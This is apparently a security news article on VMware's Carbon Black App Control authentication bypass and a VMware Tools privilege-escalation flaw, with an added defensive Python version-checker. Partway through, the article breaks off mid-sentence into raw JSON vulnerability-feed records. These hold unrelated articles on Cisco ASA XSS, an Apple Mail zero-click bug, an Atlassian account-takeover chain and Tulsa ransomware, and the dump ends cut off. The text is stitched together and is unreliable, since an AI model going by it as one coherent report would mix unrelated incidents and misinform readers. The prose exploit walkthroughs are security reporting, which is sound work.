VMware has fixed an uber-severe bug in its Carbon Black App Control (AppC) management server, a server whose job is to lock down critical systems and servers so they don’t get changed willy-nilly.
AppC also ensures that organizations stay in continuous compliance with regulatory mandates.
This is a bad one: VMware puts the flaw, [CVE-2021-21998](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21998>), in the critical severity range with a maximum CVSSv3 base score of 9.4 out of 10. The bug is an authentication bypass that could enable an attacker with network access to the server to get administrative privileges without needing to authenticate.
According to VMware’s [advisory](<https://www.vmware.com/security/advisories/VMSA-2021-0012.html>), the authentication-bypass bug affects AppC versions 8.0, 8.1, 8.5 before 8.5.8, and 8.6 before 8.6.2.
As pointed out by [Heimdal Security](<https://heimdalsecurity.com/blog/vmware-fixes-severe-carbon-black-app-control-authentication-bypass-vulnerability/>), depending on the environment, threat actors could exploit the vulnerability “to maximum advantage to attack anything from point-of-sale [systems] (PoS) to industrial-control systems.”
To avoid that, organizations must patch, as there are no workarounds available.
Below are the patches, listed in the Fixed Version column of VMware’s Response Matrix:
Product | Version | Running On | CVE Identifier | CVSSv3 | Severity | Fixed Version | Version Workarounds | Additional Documentation
---|---|---|---|---|---|---|---|---
AppC | 8.6.x | Windows | CVE-2021-21998 | 9.4 | critical | 8.6.2 | None | None
AppC | 8.5.x | Windows | CVE-2021-21998 | 9.4 | critical | 8.5.8 | None | None
AppC | 8.1.x, 8.0.x | Windows | CVE-2021-21998 | 9.4 | critical | Hotfix | None | None
Credit for discovering and reporting CVE-2021-21999 goes to [Zeeshan Shaikh](<https://twitter.com/bugzzzhunter>) from NotSoSecure, who worked with Trend Micro Zero Day Initiative (ZDI) and [Hou JingYi](<https://twitter.com/hjy79425575>) of Qihoo 360.
## Plus This: High-Risk Bug in Other VMware Products
Besides the authentication-bypass fix, VMware also published a security advisory for a high-risk bug in VMware Tools, VMware Remote Console for Windows (VMRC), and VMware App Volumes products.
At this point, the bug doesn’t have a severity score from the National Institute of Standards and Technology (NIST), but VMware evaluated it at 7.8 (high severity). The flaw, [CVE-2021-21999](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21999>), is a local privilege-escalation vulnerability.
VMware’s [advisory](<https://www.vmware.com/security/advisories/VMSA-2021-0013.html>) lists the affected products as VMware Tools for Windows (11.x.y prior to 11.2.6), VMware Remote Console for Windows (12.x prior to 12.0.1), and VMware App Volumes (2.x prior to 2.18.10 and 4 prior to 2103).
Once again, there’s no workaround for this one. Admins should patch it as soon as possible, given what VMware said can be done with it:
> An attacker with normal access to a virtual machine may exploit this issue by placing a malicious file renamed as `openssl.cnf` in an unrestricted directory which would allow code to be executed with elevated privileges.
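Both advisories give their affected ranges as "branch X prior to fixed version Y", which is easy to misread when comparing version strings by hand or lexically (where "8.5.10" sorts before "8.5.8"). The following is an added example, not code from the article, VMware or Threatpost: a small Python check that encodes the AppC response matrix above (CVE-2021-21998) and the VMSA-2021-0013 product list (CVE-2021-21999) and runs them over an asset inventory. It assumes dotted numeric version strings; the inventory, the `Finding` type and the helper names are constructed for illustration. App Volumes 4 (fixed in build 2103) uses a different version scheme and is left out.

```python
"""Affected-version check for VMSA-2021-0012 (CVE-2021-21998) and
VMSA-2021-0013 (CVE-2021-21999). Added example; the ranges come from the
advisories quoted in the article, everything else is constructed."""

from dataclasses import dataclass
from typing import List, Optional, Tuple


def parse_version(v: str) -> Tuple[int, ...]:
    """Turn '8.5.8' into (8, 5, 8) so comparisons are numeric, not lexical."""
    return tuple(int(part) for part in v.strip().split("."))


@dataclass(frozen=True)
class Finding:
    product: str
    version: str
    cve: str
    remediation: str


# CVE-2021-21998: first fixed version per AppC branch. The 8.0 and 8.1
# branches are remediated by a hotfix (response matrix), so no version
# string identifies a fixed install there; carry None to flag them.
APPC_FIXES = {
    (8, 6): "8.6.2",
    (8, 5): "8.5.8",
    (8, 1): None,
    (8, 0): None,
}


def check_appc(version: str) -> Optional[Finding]:
    """AppC 8.0, 8.1, 8.5 < 8.5.8 and 8.6 < 8.6.2 are affected."""
    v = parse_version(version)
    branch = v[:2]
    if branch not in APPC_FIXES:
        return None  # branch not named in the advisory
    fixed = APPC_FIXES[branch]
    if fixed is None:
        # A hotfix cannot be detected from the version alone; report it
        # so the operator confirms the hotfix was applied.
        return Finding("AppC", version, "CVE-2021-21998", "apply VMware hotfix")
    if v < parse_version(fixed):
        return Finding("AppC", version, "CVE-2021-21998", f"upgrade to {fixed}")
    return None


# CVE-2021-21999: (affected branch prefix, first fixed version).
LPE_FIXES = {
    "VMware Tools for Windows": ((11,), "11.2.6"),
    "VMware Remote Console for Windows": ((12,), "12.0.1"),
    "VMware App Volumes": ((2,), "2.18.10"),
}


def check_lpe(product: str, version: str) -> Optional[Finding]:
    """Tools 11.x < 11.2.6, VMRC 12.x < 12.0.1, App Volumes 2.x < 2.18.10."""
    entry = LPE_FIXES.get(product)
    if entry is None:
        return None
    prefix, fixed = entry
    v = parse_version(version)
    if v[: len(prefix)] != prefix:
        return None  # a different major branch is outside the stated range
    if v < parse_version(fixed):
        return Finding(product, version, "CVE-2021-21999", f"upgrade to {fixed}")
    return None


def scan(inventory: List[Tuple[str, str]]) -> List[Finding]:
    """Run both checks over (product, version) pairs and collect findings."""
    findings = []
    for product, version in inventory:
        f = check_appc(version) if product == "AppC" else check_lpe(product, version)
        if f is not None:
            findings.append(f)
    return findings


# Constructed inventory: three of these five entries fall in an affected range.
SAMPLE_INVENTORY = [
    ("AppC", "8.5.7"),
    ("AppC", "8.6.2"),
    ("VMware Tools for Windows", "11.2.5"),
    ("VMware Remote Console for Windows", "12.0.1"),
    ("VMware App Volumes", "2.17.0"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_INVENTORY):
        print(f"{f.product} {f.version}: {f.cve} -> {f.remediation}")
```

The hotfix branches are the caveat worth keeping: for AppC 8.0.x and 8.1.x the installed version number never changes, so a scanner that trusts version strings alone will either miss them or keep flagging them; the check above flags them deliberately so that someone confirms the hotfix is on the host.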
## History of Critical Holes
The security hole in AppC is only the latest critical problem that VMware has addressed. In February, for one, VMware [patched three vulnerabilities](<https://threatpost.com/vmware-patches-critical-rce-flaw-in-vcenter-server/164240/>) in its virtual-machine infrastructure for data centers, including a remote code-execution (RCE) flaw in its vCenter Server management platform. The vulnerability could allow attackers to breach the external perimeter of an enterprise data center or leverage backdoors already installed on a system, to find other vulnerable points of network entry to take over affected systems.
More recently, in April, another [critical cloud bug](<https://threatpost.com/critical-cloud-bug-vmware-carbon-black/165278/>), again in VMware Carbon Black, would have allowed takeover. The bug (CVE-2021-21982) ranked 9.1 out of 10 on the CVSS vulnerability-severity scale. It would enable privilege escalation and the ability to take over the administrative rights for the VMware Carbon Black Cloud Workload appliance.
the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2020-10-21T19:15:00", "type": "cve", "title": "CVE-2020-3580", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3580"], "modified": "2022-05-26T15:11:00", "cpe": [], "id": "CVE-2020-3580", 
"href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-3580", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "threatpost": [{"lastseen": "2021-04-07T21:03:22", "description": "A critical security vulnerability in the VMware Carbon Black Cloud Workload appliance would allow privilege escalation and the ability to take over the administrative rights for the solution.\n\nThe bug (CVE-2021-21982) ranks 9.1 out of 10 on the CVSS vulnerability-severity scale.\n\nThe VMware Carbon Black Cloud Workload platform is designed to provide cybersecurity defense for virtual servers and workloads that are hosted on the VMware\u2019s vSphere platform. vSphere is VMware\u2019s cloud-computing virtualization platform.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe issue in the appliance stems from incorrect URL handling, according to VMware\u2019s advisory issued last week.\n\n\u201cA URL on the administrative interface of the VMware Carbon Black Cloud Workload appliance can be manipulated to bypass authentication,\u201d the company noted. \u201cAn adversary who has already gained network access to the administrative interface of the appliance may be able to obtain a valid authentication token.\u201d\n\nThat in turn would allow the attacker to access the administration API of the appliance. Once signed in as an admin, the attacker could then view and alter administrative [configuration settings](<https://docs.vmware.com/en/VMware-Carbon-Black-Cloud-Workload/1.0/carbonblack_workload/GUID-E2ED3713-315B-4EEE-A3E8-A7A09A011101.html>). 
Depending on what tools an organization has deployed within the environment, an adversary could carry out a range of attacks, including code execution, disabling security monitoring, enumerating virtual instances within a private cloud and more.\n\n\u201cA remote attacker could exploit this vulnerability to take control of an affected system,\u201d said the Cybersecurity and Infrastructure Agency (CISA) in a [concurrent alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/vmware-releases-security-update>) on the bug.\n\nCompanies are urged to update to the latest version, [version 1.0.2](<https://docs.vmware.com/en/VMware-Carbon-Black-Cloud-Workload/1.0/rn/cbc-workload-102-release-notes.html>), of the VMware Carbon Black Cloud Workload appliance, which contains a fix.\n\nUsers should also limit access to the local administrative interface of the appliance to only those that need it, VMware recommended.\n\nEgor Dimitrenko of Positive Technologies was credited with discovering the vulnerability.\n\nThe security hole is only the latest critical problem that VMware has addressed. In February for instance, VMware [patched three vulnerabilities](<https://threatpost.com/vmware-patches-critical-rce-flaw-in-vcenter-server/164240/>) in its virtual-machine infrastructure for data centers, including a remote code execution (RCE) flaw in its vCenter Server management platform. The vulnerability could allow attackers to breach the external perimeter of an enterprise data center or leverage backdoors already installed on a system, to find other vulnerable points of network entry to take over affected systems.\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. 
ET during a _****_[FREE Threatpost event](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _****_[Register here](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_ for the Wed., April 21 LIVE event. _**\n\n**_ _**\n", "cvss3": {}, "published": "2021-04-06T20:55:47", "type": "threatpost", "title": "Critical Bug in VMWare Carbon Black Allows Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-21982"], "modified": "2021-04-06T20:55:47", "id": "THREATPOST:98B57FBF6D83FA4D12BEE06C0281FF91", "href": "https://threatpost.com/critical-cloud-bug-vmware-carbon-black/165278/", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-04-07T16:47:09", "description": "Smart cybercriminals are going after web servers and browsers, more so than after individuals. Unfortunately, these types of attacks often go ignored, as they\u2019re harder to test for (in terms of pen-testing).\n\nWith much of the world now working remotely, this threat has intensified. Attackers use email, instant messages, SMS messages and links on social networking to trick at-home workers into installing malware that leads to identity theft, loss of property and, possibly, entry into the corporate network. 
Phishing attacks may lead users to fake sites or landing pages, with the same intent.\n\nWhat are the latest risks organizations are facing, and what can be done now to defend against them?\n\n## **Web-Based Phishing On the Rise**\n\nThe cybersecurity industry is seeing a significant spike in web-based phishing, starting with the HTML/phishing cyber-threat family. Similar HTML cousins \u2013 /ScrInject (browser script injection attacks) and /REDIR (browser redirection schemes) \u2013 have also contributed to the increase in phishing attempts in 2020. Web-based malware tends to override or bypass most common antivirus (AV) programs, giving it a greater chance of survival and successful infection.\n\nThis reveals a strong interest from cybercriminals in attacking users where they are often most vulnerable and gullible: browsing the web. The combination of remote work and online shopping expand this threat significantly. Black Friday shoppers last year spent a record-shattering [$9 billion](<https://abcnews.go.com/Business/black-friday-hits-record-report/story?id=74435965>), for instance. With the COVID-19 risk of in-person shopping, 2020\u2019s Cyber Monday was reportedly the largest online sales day ever. Web-based malware can obscure and/or bypass traditional AV products, upping the chance of successful infection.\n\n## **Browsers: A Key Delivery Vector for Malware **\n\nBrowsers are not easy to secure, and web applications can be challenging to monitor. These are some of the reasons why the browser has become a key delivery vector for malware over the last year, and this trend will likely continue for the next year. 
This corresponds to the documented drop in corporate web traffic, which was generally inspected and sanitized, and the rise in home-based web traffic due to the shift to remote work.\n\nThis shift reinforces the point that cybercriminals have intentionally changed their attack methodologies to target the traffic that is now flooding lesser-secured networks. Malware trends reflect attackers\u2019 intentions and capabilities. Similar to intrusion-prevention system (IPS) detections, malware picked up by security sensors does not always indicate confirmed infections, but rather the weaponization and/or distribution of malicious code. Detections can occur at the network, application and host level on many different devices.\n\n## **What Cybersecurity Actions Should I Take Now?**\n\nThere are three things that organizations need to consider when it comes to their cybersecurity strategy:\n\n 1. **Cyber-hygiene is key:** Organizations must provide remote workers with the knowledge and training necessary to secure their own personal networks and the connected business network. This involves training but also guidance on software updates.\n 2. **Organizations can\u2019t rely on employees\u2019 personal security:** They must also provide additional resources, such as endpoint detection-and-response (EDR) solutions that can detect and stop advanced threats. Organizations need advanced, real-time threat protection for endpoints both pre- and post-infection.\n 3. **Effective cybersecurity necessitates continuous vigilance and adaptability to changing threat strategies:** Though security should have been a top priority all along, now may be the time to consider investing in broader, more advanced, adaptable, and integrated solutions \u2013 particularly as cybercriminals modify their attack methods to use personal devices as a springboard to enterprise networks. 
With this in mind, fortifying remote systems and networks should top the security to-do list.\n\n## **Staying Well-Equipped**\n\nThe threat landscape shifts constantly, requiring security pros to keep on top of new threat types and vectors. Savvy defenders should note that the browser was a prime delivery vector for malware in 2020 \u2013 and is likely to be again this year \u2013 and act accordingly to ensure consistent controls for remote systems. Regardless of the state of the world around us, the best way to protect against ever-evolving malicious activity is to take a comprehensive, integrated approach to cybersecurity.\n\nVital components of this approach include continuous access to up-to-date threat intelligence and cybersecurity training for all employees, particularly those who work remotely. It\u2019s also essential to use updated security technology, such as EDR, which detects and halts advanced threats in real time. All the intelligence in the world won\u2019t do an organization any good if its security tools aren\u2019t capable of using it to find and mitigate attacks. Make sure all of these tactics are part of your comprehensive security strategy.\n\n**_Aamir Lakhani is a cybersecurity researcher and practitioner for Fortinet\u2019s FortiGuard Labs. 
_**\n\n_**Enjoy additional insights from Threatpost\u2019s InfoSec Insider community by **_[**_visiting our microsite_**](<https://threatpost.com/microsite/infosec-insiders-community/>)_**.**_\n", "cvss3": {}, "published": "2021-04-05T17:28:13", "type": "threatpost", "title": "How To Defend the Extended Network Against Web Risks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-21982"], "modified": "2021-04-05T17:28:13", "id": "THREATPOST:6C1025257B798335D913F95B63229B76", "href": "https://threatpost.com/how-to-defend-the-extended-network-against-web-risks/165236/", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-04-07T16:39:22", "description": "A zero-click security vulnerability in Apple\u2019s macOS Mail would allow a cyberattacker to add or modify any arbitrary file inside Mail\u2019s sandbox environment, leading to a range of attack types.\n\nAccording to Mikko Kentt\u00e4l\u00e4, founder and CEO of SensorFu, exploitation of the bug could lead to unauthorized disclosure of sensitive information to a third party; the ability to modify a victim\u2019s Mail configuration, including mail redirects which enables takeover of victim\u2019s other accounts via password resets; and the ability to change the victim\u2019s configuration so that the attack can propagate to correspondents in a worm-like fashion.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThough the researcher is just now making the bug\u2019s [details available](<https://mikko-kenttala.medium.com/zero-click-vulnerability-in-apples-macos-mail-59e0c14b106c>), it was patched in macOS Mojave 10.14.6, macOS High Sierra 10.13.6, macOS Catalina 10.15.5, so users should update accordingly.\n\n## **Unauthorized Write Access**\n\nKentt\u00e4l\u00e4 said he discovered the bug ([CVE-2020-9922](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9922>)) by sending test messages and following Mail process syscalls.\n\nHe found that \u201cmail has a feature 
which enables it to automatically uncompress attachments which have been automatically compressed by another Mail user,\u201d he explained. \u201cIn the valid use case, if the user creates email and adds the folder as an attachment it will be automatically compressed with ZIP and x-mac-auto-archive=yes; is added to the MIME headers. When another Mail user receives this email, compressed attachment data is automatically uncompressed.\u201d\n\nHowever, the researcher discovered that parts of the uncompressed data are not removed from the temporary directory \u2013 and that the directory serves multiple functions, allowing attackers to pivot within the environment.\n\n\u201c[It] is not unique in context of Mail, this can be leveraged to get unauthorized write access to ~/Library/Mail and to $TMPDIR using symlinks inside of those zipped files,\u201d Kentt\u00e4l\u00e4 explained.\n\n## **Zero-Click Attack Path**\n\nTo exploit the bug, a cyberattacker could email two .ZIP files as attachments to the victim, according to the analysis. When a user receives the email, the Mail app will parse it to find any attachments with x-mac-auto-archive=yes header in place. Mail will then automatically unpack those files.\n\n\u201cThe first .ZIP includes a symlink named Mail which points to victims\u2019 $HOME/Library/Mail and file 1.txt,\u201d said Kentt\u00e4l\u00e4. \u201cThe .ZIP gets uncompressed to $TMPDIR/com.apple.mail/bom/. Based on the filename=1.txt.zip header, 1.txt gets copied to the mail director and everything works as expected. However, cleanup is not done right way and the symlink is left in place.\u201d\n\nThis left-behind symlink anchors the second stage of the attack.\n\n\u201cThe second attached .ZIP includes the changes that you want to do to $HOME/Library/Mail. This will provide arbitrary file write permission to Library/Mail,\u201d the researcher explained. \u201cIn my example case I wrote new Mail rules for the Mail application. 
With that you can add an auto forward rule to the victim\u2019s Mail application.\u201d\n\nThis arbitrary write access means that an attacker can manipulate all of the files in $HOME/Library/Mail, he added.\n\nCVE-2020-9922 is rated 6.5 on the CVSS vulnerability-severity scale, making it medium-severity, but the researcher stressed that successful exploitation could \u201clead to many bad things.\u201d\n\n\u201cAs shown, this will lead to exposure of the sensitive data to a third party through manipulating the Mail application\u2019s configuration,\u201d he said. \u201cOne of the available configuration options is the user\u2019s signature which could be used to make this vulnerability wormable. There is also a chance that this could lead to a remote code-execution (RCE) vulnerability, but I didn\u2019t go that far.\u201d\n\n**_Check out our free _**[**_upcoming live webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>))\n\n** **\n", "cvss3": {}, "published": "2021-04-05T19:10:53", "type": "threatpost", "title": "Apple Mail Zero-Click Security Vulnerability Allows Email Snooping", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-9922", "CVE-2021-21982"], "modified": "2021-04-05T19:10:53", "id": "THREATPOST:E3FA0D5BB017B7DD39D5924D32A9A668", "href": "https://threatpost.com/apple-mail-zero-click-security-vulnerability/165238/", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-06-25T16:18:42", "description": "Atlassian, a platform used by 180,000 customers to engineer software and manage projects, could have been hijacked with a single click due to security flaws, researchers have 
disclosed.\n\nOn Thursday, Check Point Research (CPR) published a report ([PDF](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/06/23175805/Atlassian-ATO-CPR-blog-FINAL.pdf>)) outlining how an attacker could have exploited the bugs to access Atlassian\u2019s Jira: A proprietary bug-tracking and agile project-management tool. Jira counts some heavyweights among its fan base: The software-development tool is used by more than 65,000 customers, including the likes of the Apache Software Foundation, Cisco, Fedora Commons, Hibernate, Pfizer and Visa.\n\nCPR researchers said that with just one click, an attacker could have siphoned sensitive information out of Jira.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nCPR researcher Roman Zaikin, author of the report, told Threatpost that the main issue is with the Atlassian platform: The team \u201cfound multiple vulnerabilities and chained them in order to find this bug,\u201d he said. As far as what sensitive information could have been drained out of the platform, Zaikin said it would have included \u201canything related to managing a team or writing\u2026code that you can encounter bugs in.\u201d\n\nThe flaws could have also enabled an attacker to take over accounts and to control some of Atlassian\u2019s applications, including Jira and Confluence, a web-based corporate wiki that comes with a built-in Tomcat web server and hsql database, and which also supports other databases. 
More than 60,000 customers use Confluence, including LinkedIn, NASA and the New York Times.\n\n## SolarWinds-esque Supply-Chain Attack\n\nWith that level of control over Atlassian, one imagines a potential exploit that would have been similar to the [SolarWinds](<https://threatpost.com/solarwinds-default-password-access-sales/162327/>) supply-chain attack, in which attackers used a default password as an open door into a software-updating mechanism.\n\nThe threat actors in that far-ranging campaign [were able to use SolarWinds\u2019 Orion network management platform](<https://threatpost.com/solarwinds-default-password-access-sales/162327/>) to infect targets by pushing out a custom backdoor called Sunburst via trojanized product updates. Far-ranging is actually an understatement: The supply-chain attack succeeded in [compromising](<https://threatpost.com/solarwinds-attackers-dhs-emails/165110/>) the head of the Department of Homeland Security (DHS) under former president Trump, other top-ranking members of the department\u2019s cybersecurity staff, numerous large enterprises and other U.S. 
government agencies.\n\nOf note, Orion is an infrastructure monitoring and management tool that sits in a network sweet spot, where it reaches other assets and thus makes [an ideal base camp](<https://threatpost.com/solarwinds-hack-seismic-shift/165758/>) for an attacker to carry out other malicious activities.\n\nIn fact, it was the SolarWinds catastrophe that inspired CPR to investigate Atlassian in the first place: Researchers said that they grew curious about supply-chain attacks following the incident.\n\nIn the course of its investigation, CPR managed to bypass Atlassian\u2019s security measures, \u201cproving that an attacker could have injected malicious code, performed actions on behalf of users and hijacked user sessions,\u201d CPR researchers wrote.\n\nThey noted that Bitbucket, a Git-based source code repository hosting service, could also have played a part in a supply-chain attack to target Atlassian partners and customers. The vulnerability affected several Atlassian-maintained websites that support customers and partners but doesn\u2019t affect Atlassian cloud-based or on-prem products.\n\nOded Vanunu, head of products vulnerabilities research at CPR, was quoted in a release as saying that supply chain attacks \u201chave piqued our interest all year, ever since the SolarWinds incident.\u201d He noted that Atlassian platforms are \u201ccentral to an organization\u2019s workflow.\u201d\n\n\u201cAn incredible amount of supply-chain information flows through these applications, as well as engineering and project management,\u201d Vanunu continued. \u201cHence, we began asking a somewhat provocative question: What information could a malicious user get if they accessed a Jira or a Confluence account?\u201d\n\n## Account Takeover\n\nThe answer: A lot of sensitive information. In its investigations, CPR achieved account takeover on Atlassian accounts accessible by subdomains under [atlassian.com](<http://atlassian.com/>). 
These are the subdomains that researchers found to be vulnerable:\n\n * [jira.atlassian.com](<http://jira.atlassian.com/>)\n * [confluence.atlassian.com](<http://confluence.atlassian.com/>)\n * [getsupport.atlassian.com](<http://getsupport.atlassian.com/>)\n * [partners.atlassian.com](<http://partners.atlassian.com/>)\n * [developer.atlassian.com](<http://developer.atlassian.com/>)\n * [support.atlassian.com](<http://support.atlassian.com/>)\n * [training.atlassian.com](<http://training.atlassian.com/>)\n\nThe bugs would have enabled an attacker to pull off a laundry list of malicious activities, such as cross-site scripting ([XSS](<https://threatpost.com/reservation-system-easy-to-exploit-xss-bug/166414/>)) attacks; cross-site request forgery ([CSRF](<https://threatpost.com/paypal-fixes-csrf-vulnerability-in-paypal-me/119435/>)) attacks; or [session fixation](<https://threatpost.com/session-fixation-forgotten-vulnerability-081710/74340/>) attacks.\n\n\u201cIn other words, an attacker could use the security flaws found by CPR to take control over a victim\u2019s account, perform actions on behalf of him, and gain access to Jira tickets,\u201d the researchers noted. \u201cFurthermore, an attacker could have edited a company\u2019s Confluence wiki, or [viewed] tickets at GetSupport. The attacker could have gone on to gain personal information. All of this could be accomplished in just one click.\u201d\n\nExploiting Atlassian required, first off, finding a way to inject code into Atlassian. Researchers did so via a XSS vulnerability on the subdomain \u201ctraining.atlassian.com,\u201d which offers users courses or credits. 
When the item type is \u201ctraining_credit,\u201d an additional parameter called \u201coptions._training_credit_account\u201d is added, to request a parameter that was vulnerable to XSS.\n\nThe Content Security Policy (CSP) was configured \u201cpoorly\u201d on this subdomain, the researchers explained, with \u201cunsafe-inline\u201d and \u201cunsafe-eval\u201d directives, which allows script execution. This made the subdomain \u201ca perfect starting point\u201d for research, they said. They were able to exploit the XSS bug to snag all the cookies and the local storage of the target.\n\nNext, since the stored XSS could only be run when adding items to the shopping cart, the researchers attempted to see if they could make a user add a malicious item without the user\u2019s notice. Given that there was no CSRF token, they could perform a CSRF attack on the shopping list and execute their payload. To do so, they uploaded a proof of concept and sent it to the would-be victim. Because that payload was stored XSS, it was stored in the database and added to the Shopping List, and their malicious item was added to the shopping cart.\n\nThe researchers used this code injection to add a new session cookie to the user\u2019s account, and, in combination with a session-fixation vulnerability in Atlassian domains, they managed to take over accounts.\n\n## Attack Methodology\n\nA successful attack chain would have entailed these steps:\n\n 1. Attacker lures victim into clicking on a crafted link (coming from the \u201cAtlassian\u201d domain), either from social media, a fake email or messaging app, etc.\n 2. By clicking on the link, the payload sends a request on behalf of the victim to the Atlassian platform, which would have performed the attack and stolen the user session.\n 3. Attacker logs onto victim\u2019s Atlassian apps associated with the account, gaining all the sensitive information stored therein.\n\nCPR disclosed its research findings to Atlassian on Jan. 8. 
According to CPR researchers, Atlassian said it deployed a patch on May 18.\n\n\u201cIn a world where distributed workforces increasingly depend on remote technologies, it\u2019s imperative to ensure these technologies have the best defenses against malicious data extraction,\u201d Vanunu concluded. \u201cWe hope our latest research will help organizations to raise the awareness on supply-chain attacks.\u201d\n\n062421 09:16 UPDATE: An Atlassian spokesperson sent this statement to Threatpost: \u201cBased on our investigation, the vulnerabilities outlined impact a limited set of Atlassian-owned web applications as well as a third-party training platform. Atlassian has shipped patches to address these issues and none of these vulnerabilities affected Atlassian Cloud (like Jira or Confluence Cloud) or on-premise products (like Jira Server or Confluence Server).\u201d\n\n062421 14:24 UPDATE 2: Added clarifying input from CPR researcher Roman Zaikin regarding what kind of information attackers could have been drained from the Atlassian platform.\n\n**Join Threatpost for \u201c**[**Tips and Tactics for Better Threat Hunting**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)**\u201d \u2014 a LIVE event on **[**Wed., June 30 at 2:00 PM ET**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)** in partnership with Palo Alto Networks. Learn from Palo Alto\u2019s Unit 42 experts the best way to hunt down threats and how to use automation to help. **[**Register HERE**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)** for free. 
**\n", "cvss3": {}, "published": "2021-06-24T10:00:47", "type": "threatpost", "title": "Atlassian Bugs Could Have Led to 1-Click Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-3580"], "modified": "2021-06-24T10:00:47", "id": "THREATPOST:A2AB7D9E07DE88E79BA713CE497B0784", "href": "https://threatpost.com/atlassian-bugs-could-have-led-to-1-click-takeover/167203/", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-06-25T16:21:06", "description": "The city of Tulsa, OK is asking some of its residents to keep a close eye on their personal and financial accounts after the Conti ransomware group leaked some 18,000 city files, mostly police citations, on the dark web.\n\nThe leak stemmed from a [May 6 ransomware attack](<https://www.cityoftulsa.org/press-room/city-of-tulsa-ransomware-update-may-20/>) that caused the city to shut down its network, disrupting its online bill payment systems, utility billing and email. The websites for the city, the Tulsa City Council, the city\u2019s police force and Tulsa 311 also were affected in the attack.\n\nBleepingComputer published [a report](<https://www.bleepingcomputer.com/news/security/tulsa-warns-of-data-breach-after-conti-ransomware-leaks-police-citations/>) Wednesday that includes what is purported to be a screenshot of the list of 18,938 files from the city of Tulsa leaked by Conti, which, in addition to police citations, also include internal Word documents.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nPolice citations contain some personal identifiable information (PII) \u2013 such as name, date of birth, address and driver\u2019s license number \u2013 but do not include Social Security numbers, according to a [statement by the city](<https://www.cityoftulsa.org/press-room/ransomware-update-june-22-tulsa-police-citations-posted-on-dark-web-tulsa-residents-should-take-necessary-precautions/>) advising people of the leak.\n\n\u201cOut of an abundance of caution, 
